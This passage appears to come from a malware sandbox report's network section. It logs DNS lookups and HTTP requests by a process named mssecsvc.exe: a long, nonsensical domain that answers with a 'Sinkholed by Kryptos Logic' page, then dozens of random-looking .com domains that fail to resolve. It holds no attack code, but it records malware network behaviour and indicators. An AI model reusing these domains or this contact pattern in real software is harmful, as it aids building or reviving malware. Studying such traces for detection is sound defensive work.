                  Jul 20, 2022 19:41:11.536740065 CEST53586578.8.8.8192.168.2.7
                  Jul 20, 2022 19:41:11.566907883 CEST53599468.8.8.8192.168.2.7
                  Jul 20, 2022 19:41:11.604803085 CEST53609208.8.8.8192.168.2.7
                  Jul 20, 2022 19:41:11.638886929 CEST53511608.8.8.8192.168.2.7
                  Jul 20, 2022 19:41:11.669434071 CEST53514888.8.8.8192.168.2.7
                  Jul 20, 2022 19:41:11.700357914 CEST53644958.8.8.8192.168.2.7
                  Jul 20, 2022 19:41:11.729897022 CEST53594458.8.8.8192.168.2.7
                  Jul 20, 2022 19:41:11.778279066 CEST53545098.8.8.8192.168.2.7
                  Jul 20, 2022 19:41:31.907274008 CEST53533588.8.8.8192.168.2.7
                  Jul 20, 2022 19:41:31.938746929 CEST53632018.8.8.8192.168.2.7
                  Jul 20, 2022 19:41:31.981983900 CEST53498158.8.8.8192.168.2.7
                  Jul 20, 2022 19:41:32.018126011 CEST53652508.8.8.8192.168.2.7
                  Jul 20, 2022 19:41:32.051223040 CEST53494958.8.8.8192.168.2.7
                  Jul 20, 2022 19:41:32.082443953 CEST53509158.8.8.8192.168.2.7
                  Jul 20, 2022 19:41:32.115998030 CEST53510738.8.8.8192.168.2.7
                  Jul 20, 2022 19:41:32.145881891 CEST53499998.8.8.8192.168.2.7
                  Jul 20, 2022 19:41:32.176541090 CEST53598748.8.8.8192.168.2.7
                  Jul 20, 2022 19:41:32.206810951 CEST53491828.8.8.8192.168.2.7
                  Jul 20, 2022 19:41:32.241542101 CEST53518898.8.8.8192.168.2.7
                  Jul 20, 2022 19:41:32.350869894 CEST53627118.8.8.8192.168.2.7
                  Jul 20, 2022 19:41:32.379601955 CEST53539078.8.8.8192.168.2.7
                  Jul 20, 2022 19:41:32.411204100 CEST53607218.8.8.8192.168.2.7
                  Jul 20, 2022 19:41:32.454534054 CEST53638528.8.8.8192.168.2.7
                  Jul 20, 2022 19:41:32.483059883 CEST53546218.8.8.8192.168.2.7
                  Jul 20, 2022 19:41:32.593996048 CEST53491708.8.8.8192.168.2.7
                  Jul 20, 2022 19:41:32.630357027 CEST53628378.8.8.8192.168.2.7
                  Jul 20, 2022 19:41:32.660556078 CEST53619888.8.8.8192.168.2.7
                  Jul 20, 2022 19:41:32.695116043 CEST53567588.8.8.8192.168.2.7
                  Jul 20, 2022 19:41:32.732392073 CEST53623818.8.8.8192.168.2.7
                  Jul 20, 2022 19:41:32.767417908 CEST53652588.8.8.8192.168.2.7
                  Jul 20, 2022 19:41:32.798933983 CEST53626858.8.8.8192.168.2.7
                  Jul 20, 2022 19:41:32.835172892 CEST53495278.8.8.8192.168.2.7
                  Jul 20, 2022 19:41:32.871599913 CEST53504268.8.8.8192.168.2.7
                  Jul 20, 2022 19:41:32.899350882 CEST53515168.8.8.8192.168.2.7
                  Jul 20, 2022 19:41:32.929575920 CEST53539538.8.8.8192.168.2.7
                  Jul 20, 2022 19:41:32.959914923 CEST53547358.8.8.8192.168.2.7
                  Jul 20, 2022 19:41:33.007523060 CEST53588838.8.8.8192.168.2.7
                  Jul 20, 2022 19:41:33.035850048 CEST53645218.8.8.8192.168.2.7
                  Jul 20, 2022 19:41:33.065943003 CEST53580978.8.8.8192.168.2.7
                  Jul 20, 2022 19:41:33.100944042 CEST53491988.8.8.8192.168.2.7
                  Jul 20, 2022 19:41:33.140516996 CEST53594898.8.8.8192.168.2.7
                  Jul 20, 2022 19:41:33.172588110 CEST53538978.8.8.8192.168.2.7
                  Jul 20, 2022 19:41:33.210629940 CEST53564328.8.8.8192.168.2.7
                  Jul 20, 2022 19:41:33.267978907 CEST53530868.8.8.8192.168.2.7
                  Jul 20, 2022 19:41:33.305315018 CEST53571388.8.8.8192.168.2.7
                  Jul 20, 2022 19:41:33.343621969 CEST53588828.8.8.8192.168.2.7
                  Jul 20, 2022 19:41:33.380621910 CEST53633808.8.8.8192.168.2.7
                  Jul 20, 2022 19:41:33.410552025 CEST53582268.8.8.8192.168.2.7
                  Jul 20, 2022 19:41:33.446264029 CEST53604338.8.8.8192.168.2.7
                  Jul 20, 2022 19:41:33.476286888 CEST53587618.8.8.8192.168.2.7
                  Jul 20, 2022 19:41:33.525625944 CEST53515338.8.8.8192.168.2.7
                  Jul 20, 2022 19:41:33.561858892 CEST53581368.8.8.8192.168.2.7
                  Jul 20, 2022 19:41:33.596668959 CEST53508718.8.8.8192.168.2.7
                  Jul 20, 2022 19:41:33.625464916 CEST53586138.8.8.8192.168.2.7
                  Jul 20, 2022 19:41:33.661581993 CEST53587918.8.8.8192.168.2.7
                  Jul 20, 2022 19:41:33.692193985 CEST53594438.8.8.8192.168.2.7
                  Jul 20, 2022 19:41:33.723222971 CEST53600828.8.8.8192.168.2.7
                  Jul 20, 2022 19:41:34.769823074 CEST53491738.8.8.8192.168.2.7
                  Jul 20, 2022 19:41:34.805844069 CEST53580338.8.8.8192.168.2.7
                  Jul 20, 2022 19:41:35.848975897 CEST53508928.8.8.8192.168.2.7
                  Jul 20, 2022 19:41:35.879961014 CEST53586608.8.8.8192.168.2.7
                  Jul 20, 2022 19:41:35.910624981 CEST53624728.8.8.8192.168.2.7
                  Jul 20, 2022 19:41:35.945548058 CEST53557808.8.8.8192.168.2.7
                  Jul 20, 2022 19:41:35.979069948 CEST53647398.8.8.8192.168.2.7
                  Jul 20, 2022 19:41:36.008625984 CEST53582538.8.8.8192.168.2.7
                  Jul 20, 2022 19:41:36.039429903 CEST53522698.8.8.8192.168.2.7
                  Jul 20, 2022 19:41:36.073383093 CEST53554028.8.8.8192.168.2.7
                  Jul 20, 2022 19:41:36.106430054 CEST53601528.8.8.8192.168.2.7
                  Jul 20, 2022 19:41:36.142524958 CEST53503998.8.8.8192.168.2.7
                  Jul 20, 2022 19:41:36.253673077 CEST53639828.8.8.8192.168.2.7
                  Jul 20, 2022 19:41:36.283185005 CEST53589568.8.8.8192.168.2.7
                  Jul 20, 2022 19:41:36.315047979 CEST53551348.8.8.8192.168.2.7
                  Jul 20, 2022 19:41:36.345887899 CEST53633918.8.8.8192.168.2.7
                  Jul 20, 2022 19:41:36.376631975 CEST53527418.8.8.8192.168.2.7
                  Jul 20, 2022 19:41:36.407152891 CEST53554288.8.8.8192.168.2.7
                  Jul 20, 2022 19:41:36.437306881 CEST53640888.8.8.8192.168.2.7
                  Jul 20, 2022 19:41:36.486955881 CEST53597888.8.8.8192.168.2.7
                  Jul 20, 2022 19:41:37.532622099 CEST53605768.8.8.8192.168.2.7
                  Jul 20, 2022 19:41:37.572000980 CEST53577048.8.8.8192.168.2.7
                  Jul 20, 2022 19:41:37.602675915 CEST53558878.8.8.8192.168.2.7

                  DNS Queries

                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                  Jul 20, 2022 19:38:14.102838039 CEST192.168.2.78.8.8.80xda4Standard query (0)www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.comA (IP address)IN (0x0001)
                  Jul 20, 2022 19:40:36.279977083 CEST192.168.2.78.8.8.80x42f7Standard query (0)www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.comA (IP address)IN (0x0001)

                  DNS Answers

                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                  Jul 20, 2022 19:38:14.126581907 CEST8.8.8.8192.168.2.70xda4No error (0)www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com104.16.173.80A (IP address)IN (0x0001)
                  Jul 20, 2022 19:38:14.126581907 CEST8.8.8.8192.168.2.70xda4No error (0)www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com104.17.244.81A (IP address)IN (0x0001)
                  Jul 20, 2022 19:40:36.303530931 CEST8.8.8.8192.168.2.70x42f7No error (0)www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com104.16.173.80A (IP address)IN (0x0001)
                  Jul 20, 2022 19:40:36.303530931 CEST8.8.8.8192.168.2.70x42f7No error (0)www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com104.17.244.81A (IP address)IN (0x0001)
                  Jul 20, 2022 19:41:08.202572107 CEST8.8.8.8192.168.2.70x673cName error (3)tlmowf.comnonenoneA (IP address)IN (0x0001)
                  Jul 20, 2022 19:41:08.301064968 CEST8.8.8.8192.168.2.70xc0b2Name error (3)lyeaew.comnonenoneA (IP address)IN (0x0001)
                  Jul 20, 2022 19:41:08.374860048 CEST8.8.8.8192.168.2.70xfc5Name error (3)kqurib.comnonenoneA (IP address)IN (0x0001)
                  Jul 20, 2022 19:41:09.083990097 CEST8.8.8.8192.168.2.70x1d9eName error (3)pqjxkf.comnonenoneA (IP address)IN (0x0001)
                  Jul 20, 2022 19:41:09.165765047 CEST8.8.8.8192.168.2.70x2a89Name error (3)omxsxm.comnonenoneA (IP address)IN (0x0001)
                  Jul 20, 2022 19:41:09.199461937 CEST8.8.8.8192.168.2.70xb170Name error (3)yurwei.comnonenoneA (IP address)IN (0x0001)
                  Jul 20, 2022 19:41:09.284782887 CEST8.8.8.8192.168.2.70x1756Name error (3)vpqnxj.comnonenoneA (IP address)IN (0x0001)
                  Jul 20, 2022 19:41:09.324182034 CEST8.8.8.8192.168.2.70x4ab9Name error (3)cxfuoy.comnonenoneA (IP address)IN (0x0001)
                  Jul 20, 2022 19:41:09.389641047 CEST8.8.8.8192.168.2.70xbab8Name error (3)iuwutz.comnonenoneA (IP address)IN (0x0001)
                  Jul 20, 2022 19:41:09.483437061 CEST8.8.8.8192.168.2.70xc036Name error (3)iodilu.comnonenoneA (IP address)IN (0x0001)
                  Jul 20, 2022 19:41:09.520129919 CEST8.8.8.8192.168.2.70x477fName error (3)eekkiz.comnonenoneA (IP address)IN (0x0001)
                  Jul 20, 2022 19:41:09.595463991 CEST8.8.8.8192.168.2.70x9878Name error (3)asesdh.comnonenoneA (IP address)IN (0x0001)
                  Jul 20, 2022 19:41:09.633013964 CEST8.8.8.8192.168.2.70x5af1Name error (3)ebalrg.comnonenoneA (IP address)IN (0x0001)
                  Jul 20, 2022 19:41:10.979248047 CEST8.8.8.8192.168.2.70xf828Name error (3)gfjioe.comnonenoneA (IP address)IN (0x0001)
                  Jul 20, 2022 19:41:11.046283007 CEST8.8.8.8192.168.2.70x1be0Name error (3)emjlon.comnonenoneA (IP address)IN (0x0001)
                  Jul 20, 2022 19:41:11.159229040 CEST8.8.8.8192.168.2.70xe973Name error (3)osbytn.comnonenoneA (IP address)IN (0x0001)
                  Jul 20, 2022 19:41:11.251528978 CEST8.8.8.8192.168.2.70x182eName error (3)syeyep.comnonenoneA (IP address)IN (0x0001)
                  Jul 20, 2022 19:41:11.384242058 CEST8.8.8.8192.168.2.70x7059Name error (3)faepoi.comnonenoneA (IP address)IN (0x0001)
                  Jul 20, 2022 19:41:11.486620903 CEST8.8.8.8192.168.2.70x81d3Name error (3)yzeofb.comnonenoneA (IP address)IN (0x0001)
                  Jul 20, 2022 19:41:11.536740065 CEST8.8.8.8192.168.2.70xed6bName error (3)iqhufw.comnonenoneA (IP address)IN (0x0001)
                  Jul 20, 2022 19:41:11.566907883 CEST8.8.8.8192.168.2.70x4df5Name error (3)rdtvdr.comnonenoneA (IP address)IN (0x0001)
                  Jul 20, 2022 19:41:11.604803085 CEST8.8.8.8192.168.2.70x736dName error (3)duomeu.comnonenoneA (IP address)IN (0x0001)
                  Jul 20, 2022 19:41:11.638886929 CEST8.8.8.8192.168.2.70xf4f2Name error (3)vuhaba.comnonenoneA (IP address)IN (0x0001)
                  Jul 20, 2022 19:41:11.669434071 CEST8.8.8.8192.168.2.70x817fName error (3)xinoyg.comnonenoneA (IP address)IN (0x0001)
                  Jul 20, 2022 19:41:11.700357914 CEST8.8.8.8192.168.2.70x9c6aName error (3)ikgcbn.comnonenoneA (IP address)IN (0x0001)
                  Jul 20, 2022 19:41:11.729897022 CEST8.8.8.8192.168.2.70x1125Name error (3)iyvsrd.comnonenoneA (IP address)IN (0x0001)
                  Jul 20, 2022 19:41:11.778279066 CEST8.8.8.8192.168.2.70x5ebdName error (3)zmquum.comnonenoneA (IP address)IN (0x0001)
                  Jul 20, 2022 19:41:31.907274008 CEST8.8.8.8192.168.2.70xd714Name error (3)wabuqy.comnonenoneA (IP address)IN (0x0001)
                  Jul 20, 2022 19:41:31.938746929 CEST8.8.8.8192.168.2.70xc175Name error (3)bxoqpu.comnonenoneA (IP address)IN (0x0001)
                  Jul 20, 2022 19:41:31.981983900 CEST8.8.8.8192.168.2.70x65d0Name error (3)onmwqv.comnonenoneA (IP address)IN (0x0001)
                  Jul 20, 2022 19:41:32.018126011 CEST8.8.8.8192.168.2.70x64ecName error (3)kyivtg.comnonenoneA (IP address)IN (0x0001)
                  Jul 20, 2022 19:41:32.051223040 CEST8.8.8.8192.168.2.70xa449Name error (3)yuayzn.comnonenoneA (IP address)IN (0x0001)
                  Jul 20, 2022 19:41:32.082443953 CEST8.8.8.8192.168.2.70xc8eName error (3)zaobbc.comnonenoneA (IP address)IN (0x0001)
                  Jul 20, 2022 19:41:32.115998030 CEST8.8.8.8192.168.2.70x5e59Name error (3)zsljps.comnonenoneA (IP address)IN (0x0001)
                  Jul 20, 2022 19:41:32.145881891 CEST8.8.8.8192.168.2.70x51cfName error (3)oktbec.comnonenoneA (IP address)IN (0x0001)
                  Jul 20, 2022 19:41:32.176541090 CEST8.8.8.8192.168.2.70x98eName error (3)ocxepi.comnonenoneA (IP address)IN (0x0001)
                  Jul 20, 2022 19:41:32.206810951 CEST8.8.8.8192.168.2.70x206fName error (3)nbfpvs.comnonenoneA (IP address)IN (0x0001)
                  Jul 20, 2022 19:41:32.241542101 CEST8.8.8.8192.168.2.70xc7fbName error (3)igeeyv.comnonenoneA (IP address)IN (0x0001)
                  Jul 20, 2022 19:41:32.350869894 CEST8.8.8.8192.168.2.70xc178Name error (3)yraxyh.comnonenoneA (IP address)IN (0x0001)
                  Jul 20, 2022 19:41:32.379601955 CEST8.8.8.8192.168.2.70x9a69Name error (3)pombmi.comnonenoneA (IP address)IN (0x0001)
                  Jul 20, 2022 19:41:32.411204100 CEST8.8.8.8192.168.2.70x87ffName error (3)ajiunz.comnonenoneA (IP address)IN (0x0001)
                  Jul 20, 2022 19:41:32.454534054 CEST8.8.8.8192.168.2.70xacaName error (3)oeyeob.comnonenoneA (IP address)IN (0x0001)
                  Jul 20, 2022 19:41:32.483059883 CEST8.8.8.8192.168.2.70xc65cName error (3)mupjvv.comnonenoneA (IP address)IN (0x0001)
                  Jul 20, 2022 19:41:32.593996048 CEST8.8.8.8192.168.2.70xec52Name error (3)lovzje.comnonenoneA (IP address)IN (0x0001)
                  Jul 20, 2022 19:41:32.630357027 CEST8.8.8.8192.168.2.70x3b2bName error (3)vurdyj.comnonenoneA (IP address)IN (0x0001)
                  Jul 20, 2022 19:41:32.660556078 CEST8.8.8.8192.168.2.70x4793Name error (3)zynrye.comnonenoneA (IP address)IN (0x0001)
                  Jul 20, 2022 19:41:32.695116043 CEST8.8.8.8192.168.2.70xf6bName error (3)lyyppo.comnonenoneA (IP address)IN (0x0001)
                  Jul 20, 2022 19:41:32.732392073 CEST8.8.8.8192.168.2.70xba60Name error (3)ayxohj.comnonenoneA (IP address)IN (0x0001)
                  Jul 20, 2022 19:41:32.767417908 CEST8.8.8.8192.168.2.70x6134Name error (3)ibmzei.comnonenoneA (IP address)IN (0x0001)
                  Jul 20, 2022 19:41:32.798933983 CEST8.8.8.8192.168.2.70x58bdName error (3)ouyghe.comnonenoneA (IP address)IN (0x0001)
                  Jul 20, 2022 19:41:32.835172892 CEST8.8.8.8192.168.2.70x1b19Name error (3)mipimr.comnonenoneA (IP address)IN (0x0001)
                  Jul 20, 2022 19:41:32.871599913 CEST8.8.8.8192.168.2.70x20f1Name error (3)gefpqv.comnonenoneA (IP address)IN (0x0001)
                  Jul 20, 2022 19:41:32.899350882 CEST8.8.8.8192.168.2.70xb157Name error (3)ovgvxa.comnonenoneA (IP address)IN (0x0001)
                  Jul 20, 2022 19:41:32.929575920 CEST8.8.8.8192.168.2.70x9dc8Name error (3)eaqmly.comnonenoneA (IP address)IN (0x0001)
                  Jul 20, 2022 19:41:32.959914923 CEST8.8.8.8192.168.2.70xd9a0Name error (3)aantza.comnonenoneA (IP address)IN (0x0001)
                  Jul 20, 2022 19:41:33.007523060 CEST8.8.8.8192.168.2.70x7d6Name error (3)ypfefo.comnonenoneA (IP address)IN (0x0001)
                  Jul 20, 2022 19:41:33.035850048 CEST8.8.8.8192.168.2.70x7578Name error (3)ttviky.comnonenoneA (IP address)IN (0x0001)
                  Jul 20, 2022 19:41:33.065943003 CEST8.8.8.8192.168.2.70x4741Name error (3)eaqtlo.comnonenoneA (IP address)IN (0x0001)
                  Jul 20, 2022 19:41:33.100944042 CEST8.8.8.8192.168.2.70x4a0cName error (3)eyakeo.comnonenoneA (IP address)IN (0x0001)
                  Jul 20, 2022 19:41:33.140516996 CEST8.8.8.8192.168.2.70x79f8Name error (3)uhcquu.comnonenoneA (IP address)IN (0x0001)
                  Jul 20, 2022 19:41:33.172588110 CEST8.8.8.8192.168.2.70xd0f3Name error (3)ibhjiz.comnonenoneA (IP address)IN (0x0001)
                  Jul 20, 2022 19:41:33.210629940 CEST8.8.8.8192.168.2.70x5187Name error (3)ldyouw.comnonenoneA (IP address)IN (0x0001)
                  Jul 20, 2022 19:41:33.305315018 CEST8.8.8.8192.168.2.70x879dName error (3)exjeos.comnonenoneA (IP address)IN (0x0001)
                  Jul 20, 2022 19:41:33.343621969 CEST8.8.8.8192.168.2.70xfb4eName error (3)xaatge.comnonenoneA (IP address)IN (0x0001)
                  Jul 20, 2022 19:41:33.380621910 CEST8.8.8.8192.168.2.70xf51fName error (3)sjotuu.comnonenoneA (IP address)IN (0x0001)
                  Jul 20, 2022 19:41:33.410552025 CEST8.8.8.8192.168.2.70x9bffName error (3)jiqvfz.comnonenoneA (IP address)IN (0x0001)
                  Jul 20, 2022 19:41:33.446264029 CEST8.8.8.8192.168.2.70x4b52Name error (3)nbjvkj.comnonenoneA (IP address)IN (0x0001)
                  Jul 20, 2022 19:41:33.476286888 CEST8.8.8.8192.168.2.70x8808Name error (3)bnkmik.comnonenoneA (IP address)IN (0x0001)
                  Jul 20, 2022 19:41:33.525625944 CEST8.8.8.8192.168.2.70x75aName error (3)loozpo.comnonenoneA (IP address)IN (0x0001)
                  Jul 20, 2022 19:41:33.561858892 CEST8.8.8.8192.168.2.70xe138Name error (3)peyuye.comnonenoneA (IP address)IN (0x0001)
                  Jul 20, 2022 19:41:33.596668959 CEST8.8.8.8192.168.2.70xd9e6Name error (3)hhvuzb.comnonenoneA (IP address)IN (0x0001)
                  Jul 20, 2022 19:41:33.625464916 CEST8.8.8.8192.168.2.70x6964Name error (3)eayzaw.comnonenoneA (IP address)IN (0x0001)
                  Jul 20, 2022 19:41:33.661581993 CEST8.8.8.8192.168.2.70x2b79Name error (3)ogggyz.comnonenoneA (IP address)IN (0x0001)
                  Jul 20, 2022 19:41:33.692193985 CEST8.8.8.8192.168.2.70x5c3Name error (3)jzeiry.comnonenoneA (IP address)IN (0x0001)
                  Jul 20, 2022 19:41:33.723222971 CEST8.8.8.8192.168.2.70xa37bName error (3)flcdqa.comnonenoneA (IP address)IN (0x0001)
                  Jul 20, 2022 19:41:34.769823074 CEST8.8.8.8192.168.2.70x778eName error (3)ybeujn.comnonenoneA (IP address)IN (0x0001)
                  Jul 20, 2022 19:41:34.805844069 CEST8.8.8.8192.168.2.70x51c5Name error (3)cqofos.comnonenoneA (IP address)IN (0x0001)
                  Jul 20, 2022 19:41:35.848975897 CEST8.8.8.8192.168.2.70x4977Name error (3)teasgj.comnonenoneA (IP address)IN (0x0001)
                  Jul 20, 2022 19:41:35.879961014 CEST8.8.8.8192.168.2.70x52b9Name error (3)hpqelp.comnonenoneA (IP address)IN (0x0001)
                  Jul 20, 2022 19:41:35.910624981 CEST8.8.8.8192.168.2.70x33fbName error (3)mdrnku.comnonenoneA (IP address)IN (0x0001)
                  Jul 20, 2022 19:41:35.945548058 CEST8.8.8.8192.168.2.70xcdc1Name error (3)pxbypa.comnonenoneA (IP address)IN (0x0001)
                  Jul 20, 2022 19:41:35.979069948 CEST8.8.8.8192.168.2.70x1f41Name error (3)rjajzc.comnonenoneA (IP address)IN (0x0001)
                  Jul 20, 2022 19:41:36.008625984 CEST8.8.8.8192.168.2.70xe375Name error (3)cododi.comnonenoneA (IP address)IN (0x0001)
                  Jul 20, 2022 19:41:36.039429903 CEST8.8.8.8192.168.2.70xd4c8Name error (3)nuzyfp.comnonenoneA (IP address)IN (0x0001)
                  Jul 20, 2022 19:41:36.073383093 CEST8.8.8.8192.168.2.70x4ae9Name error (3)txaoos.comnonenoneA (IP address)IN (0x0001)
                  Jul 20, 2022 19:41:36.106430054 CEST8.8.8.8192.168.2.70x2ba1Name error (3)mrbfyf.comnonenoneA (IP address)IN (0x0001)
                  Jul 20, 2022 19:41:36.142524958 CEST8.8.8.8192.168.2.70x32bdName error (3)atiajo.comnonenoneA (IP address)IN (0x0001)
                  Jul 20, 2022 19:41:36.253673077 CEST8.8.8.8192.168.2.70x78f2Name error (3)yzwoea.comnonenoneA (IP address)IN (0x0001)
                  Jul 20, 2022 19:41:36.283185005 CEST8.8.8.8192.168.2.70x6e81Name error (3)pvyeyr.comnonenoneA (IP address)IN (0x0001)
                  Jul 20, 2022 19:41:36.315047979 CEST8.8.8.8192.168.2.70x1cafName error (3)ueercj.comnonenoneA (IP address)IN (0x0001)
                  Jul 20, 2022 19:41:36.345887899 CEST8.8.8.8192.168.2.70x1431Name error (3)yivanc.comnonenoneA (IP address)IN (0x0001)
                  Jul 20, 2022 19:41:36.376631975 CEST8.8.8.8192.168.2.70x5197Name error (3)hyevqm.comnonenoneA (IP address)IN (0x0001)
                  Jul 20, 2022 19:41:36.407152891 CEST8.8.8.8192.168.2.70xa394Name error (3)jrkbyt.comnonenoneA (IP address)IN (0x0001)
                  Jul 20, 2022 19:41:36.437306881 CEST8.8.8.8192.168.2.70x92a5Name error (3)wyksye.comnonenoneA (IP address)IN (0x0001)
                  Jul 20, 2022 19:41:36.486955881 CEST8.8.8.8192.168.2.70x78a5Name error (3)oonymf.comnonenoneA (IP address)IN (0x0001)
                  Jul 20, 2022 19:41:37.532622099 CEST8.8.8.8192.168.2.70x7cd7Name error (3)uqghqa.comnonenoneA (IP address)IN (0x0001)
                  Jul 20, 2022 19:41:37.572000980 CEST8.8.8.8192.168.2.70x916eName error (3)tdfkhn.comnonenoneA (IP address)IN (0x0001)
                  Jul 20, 2022 19:41:37.602675915 CEST8.8.8.8192.168.2.70xb711Name error (3)izuupl.comnonenoneA (IP address)IN (0x0001)

                  HTTP Request Dependency Graph

                  • www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com

                  HTTP Packets

                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  0192.168.2.749722104.16.173.8080C:\Windows\mssecsvc.exe
                  TimestampkBytes transferredDirectionData
                  Jul 20, 2022 19:38:14.180756092 CEST0OUTGET / HTTP/1.1
                  Host: www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com
                  Cache-Control: no-cache
                  Jul 20, 2022 19:38:14.222408056 CEST1INHTTP/1.1 200 OK
                  Date: Wed, 20 Jul 2022 17:38:14 GMT
                  Content-Type: text/html
                  Content-Length: 607
                  Connection: close
                  Server: cloudflare
                  CF-RAY: 72dd7826abe95c14-FRA
                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 75 73 22 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 74 69 74 6c 65 3e 53 69 6e 6b 68 6f 6c 65 64 20 62 79 20 4b 72 79 70 74 6f 73 20 4c 6f 67 69 63 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 4b 72 79 70 74 6f 73 20 4c 6f 67 69 63 20 53 69 6e 6b 68 6f 6c 65 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 2f 73 74 61 74 69 63 2e 6b 72 79 70 74 6f 73 6c 6f 67 69 63 73 69 6e 6b 68 6f 6c 65 2e 63 6f 6d 2f 73 74 79 6c 65 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 2f 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 66 6c 61 74 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 65 6e 74 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 65 6e 74 2d 62 6f 78 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 69 67 2d 63 6f 6e 74 65 6e 74 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6c 65 61 72 22 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 68 31 3e 53 69 6e 6b 68 6f 6c 65 64 21 3c 2f 68 31 3e 3c 70 3e 54 68 69 73 20 64 6f 6d 61 69 6e 20 68 61 73 20 62 65 65 6e 20 73 69 6e 6b 68 6f 6c 65 64 20 62 79 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6b 72 79 70 74 6f 73 6c 6f 67 69 63 2e 63 6f 6d 22 3e 4b 72 79 70 74 6f 73 20 4c 6f 67 69 63 3c 2f 61 3e 2e 3c 2f 70 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                  Data Ascii: <!DOCTYPE html><html lang="en-us" class="no-js"><head><meta charset="utf-8"><title>Sinkholed by Kryptos Logic</title><meta name="description" content="Kryptos Logic Sinkhole"><meta name="viewport" content="width=device-width, initial-scale=1.0"><link href="//static.kryptoslogicsinkhole.com/style.css" rel="stylesheet" type="text/css"/></head><body class="flat"><div class="content"><div class="content-box"><div class="big-content"><div class="clear"></div></div><h1>Sinkholed!</h1><p>This domain has been sinkholed by <a href="https://www.kryptoslogic.com">Kryptos Logic</a>.</p></div></div></body></html>


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  1192.168.2.749729104.16.173.8080C:\Windows\mssecsvc.exe
                  TimestampkBytes transferredDirectionData
                  Jul 20, 2022 19:40:36.366445065 CEST22OUTGET / HTTP/1.1
                  Host: www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com
                  Cache-Control: no-cache
                  Jul 20, 2022 19:40:36.404547930 CEST23INHTTP/1.1 200 OK
                  Date: Wed, 20 Jul 2022 17:40:36 GMT
                  Content-Type: text/html
                  Content-Length: 607
                  Connection: close
                  Server: cloudflare
                  CF-RAY: 72dd7b9f5ba1691b-FRA
                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 75 73 22 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 74 69 74 6c 65 3e 53 69 6e 6b 68 6f 6c 65 64 20 62 79 20 4b 72 79 70 74 6f 73 20 4c 6f 67 69 63 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 4b 72 79 70 74 6f 73 20 4c 6f 67 69 63 20 53 69 6e 6b 68 6f 6c 65 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 2f 73 74 61 74 69 63 2e 6b 72 79 70 74 6f 73 6c 6f 67 69 63 73 69 6e 6b 68 6f 6c 65 2e 63 6f 6d 2f 73 74 79 6c 65 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 2f 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 66 6c 61 74 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 65 6e 74 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 65 6e 74 2d 62 6f 78 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 69 67 2d 63 6f 6e 74 65 6e 74 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6c 65 61 72 22 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 68 31 3e 53 69 6e 6b 68 6f 6c 65 64 21 3c 2f 68 31 3e 3c 70 3e 54 68 69 73 20 64 